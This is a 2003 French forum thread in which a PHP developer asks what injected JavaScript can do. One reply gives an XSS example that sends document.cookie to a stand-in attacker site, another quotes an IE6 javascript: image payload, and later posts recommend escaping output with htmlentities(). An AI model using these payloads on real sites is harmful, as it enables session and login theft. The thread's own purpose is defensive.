Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
847 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  sécurité javascript

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

sécurité javascript

n°340809
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 23-03-2003 à 17:46:54  profilanswer
 

je programme en php et je voulais savoir ce qui etait dangereux comme javascript au cas ou quelqu'un arrive a inserer du javascript dans ma page ?


Message édité par forummp3 le 23-03-2003 à 17:47:12
mood
Publicité
Posté le 23-03-2003 à 17:46:54  profilanswer
 

n°340810
kadreg
profil: Utilisateur
Posté le 23-03-2003 à 17:52:15  profilanswer
 

Cross site scripting (XSS) :
 
<script>document.location='http://www.lesiteduhacker.com/cookie.cgi? '%20+document.cookie</script>
 
permet d'envoyer sur le site du vilain les cookies utilisé pour ton site, le plus interressant étant évidemment login et mots de passe, identifiant de session.
 
Sinon, une connerier du genre :  
window.open (document.location)
 
Toujours pénible
 
FAQ XSS : http://www.cgisecurity.com/articles/xss-faq.shtml


Message édité par kadreg le 23-03-2003 à 17:52:48

---------------
brisez les rêves des gens, il en restera toujours quelque chose...  -- laissez moi troller sur discu !
n°340819
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 23-03-2003 à 18:08:25  profilanswer
 

kadreg a écrit :

Cross site scripting (XSS) :
 
<script>document.location='http://www.lesiteduhacker.com/cookie.cgi? '%20+document.cookie</script>
 
permet d'envoyer sur le site du vilain les cookies utilisé pour ton site, le plus interressant étant évidemment login et mots de passe, identifiant de session.
 
Sinon, une connerier du genre :  
window.open (document.location)
 
Toujours pénible
 
FAQ XSS : http://www.cgisecurity.com/articles/xss-faq.shtml

c si puissant que ca  :ouch:  
 
on serait dans la merde si ca arrivait avec le forum de joce :D

n°340821
Suri
Darksurious
Posté le 23-03-2003 à 18:12:28  profilanswer
 

forummp3 a écrit :

c si puissant que ca  :ouch:  
 
on serait dans la merde si ca arrivait avec le forum de joce :D


oui mais bon, si tu fais un minimum attention ben t'as pas ce genre de failles :D


Message édité par Suri le 23-03-2003 à 18:12:42
n°340829
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 23-03-2003 à 18:26:00  profilanswer
 

Suri a écrit :


oui mais bon, si tu fais un minimum attention ben t'as pas ce genre de failles :D

tu sais l'erreur est humaine :D

n°340841
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 23-03-2003 à 18:48:13  profilanswer
 

sinon ya que ca comme faille ? :??:

n°340847
art_dupond
je suis neuneu... oui oui !!
Posté le 23-03-2003 à 19:12:01  profilanswer
 

un commentaire dans la doc de php.net
 

Citation :


Keep in mind that there's a bug in IE 6 that let's people insert JS into <IMG> SRC tag.
 
<img src="javascript:alert('Hello world';)" />
 
Something like that.
 
Don't allow <img>!!!

n°340854
Suri
Darksurious
Posté le 23-03-2003 à 19:47:08  profilanswer
 

forummp3 a écrit :

sinon ya que ca comme faille ? :??:


faille d'include
faille de post/get  
etc.. un coup de google tu trouveras ton bonheur :d

n°340855
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 23-03-2003 à 19:49:16  profilanswer
 

Suri a écrit :


faille d'include
faille de post/get  
etc.. un coup de google tu trouveras ton bonheur :d

je parlais de faille javascript,a part le script pour recuper le cookies,ya rien d'autre ?

n°340874
Suri
Darksurious
Posté le 23-03-2003 à 20:59:49  profilanswer
 

forummp3 a écrit :

je parlais de faille javascript,a part le script pour recuper le cookies,ya rien d'autre ?

ben tout ce que peux faire un script... ya pas non plus que le javascript... si t sous win t'as le vbscript (language de bcp de virus :ange: ) qui peut etre bien plus mechant...


---------------
Suri.morkitu.org : Balades au coeur de la ville...
mood
Publicité
Posté le 23-03-2003 à 20:59:49  profilanswer
 

n°340891
forummp3
@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@
Posté le 23-03-2003 à 21:55:55  profilanswer
 

Suri a écrit :

ben tout ce que peux faire un script... ya pas non plus que le javascript... si t sous win t'as le vbscript (language de bcp de virus :ange: ) qui peut etre bien plus mechant...

[:totoz]
 
bon ben je vais verifier tout ca :D

n°340913
Suri
Darksurious
Posté le 23-03-2003 à 22:49:03  profilanswer
 

forummp3 a écrit :

[:totoz]
 
bon ben je vais verifier tout ca :D


suffit de desactiver le html ds toutes les entrees utilisateur...


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°340926
axey
http://www.00f.net
Posté le 23-03-2003 à 22:59:27  profilanswer
 

Non, suffit de correctement quoter tout ce qui est du texte.
 
En PHP, htmlentities() et urlencode() font ça très bien.

n°340933
Suri
Darksurious
Posté le 23-03-2003 à 23:10:46  profilanswer
 

axey a écrit :

Non, suffit de correctement quoter tout ce qui est du texte.
 
En PHP, htmlentities() et urlencode() font ça très bien.
 


 
oui donc c ce que j'ai dis en gros hein :D


---------------
Suri.morkitu.org : Balades au coeur de la ville...
n°341051
axey
http://www.00f.net
Posté le 24-03-2003 à 09:10:00  profilanswer
 

Non, tu as dit qu'il fallait "desactiver le html".
 
Pour moi ca veut dire que tu retires tout ce qui ressemble à une balise (genre si le mec veut poster <script language="text/vbscript"> il peut pas car c'est viré au lieu d'etre affiché. Il y a des forums qui font ça) .

n°341098
Suri
Darksurious
Posté le 24-03-2003 à 10:16:44  profilanswer
 

axey a écrit :

Non, tu as dit qu'il fallait "desactiver le html".
 
Pour moi ca veut dire que tu retires tout ce qui ressemble à une balise (genre si le mec veut poster <script language="text/vbscript"> il peut pas car c'est viré au lieu d'etre affiché. Il y a des forums qui font ça) .
 


mouais, enfin je pensais a htmlentities() :D


---------------
Suri.morkitu.org : Balades au coeur de la ville...

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  HTML/CSS

  sécurité javascript

 

Sujets relatifs
Javascript et Flash prob de popup.faille de sécurité dans mon script PhpWebGallery
javascript buggé ???[JavaScript] Changer les propriétés d'un tableau ?
Prob avec le cadre de destination d'un lien dans un javascript.[flash] introduire un script javascript dans du flash (newbie)
Mise en forme d'une alert javascriptJavascript probleme !!
[Js] Tribune javascriptHacking et faille de sécurité MySQL, aidez-moi à me protéger.
Plus de sujets relatifs à : sécurité javascript


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR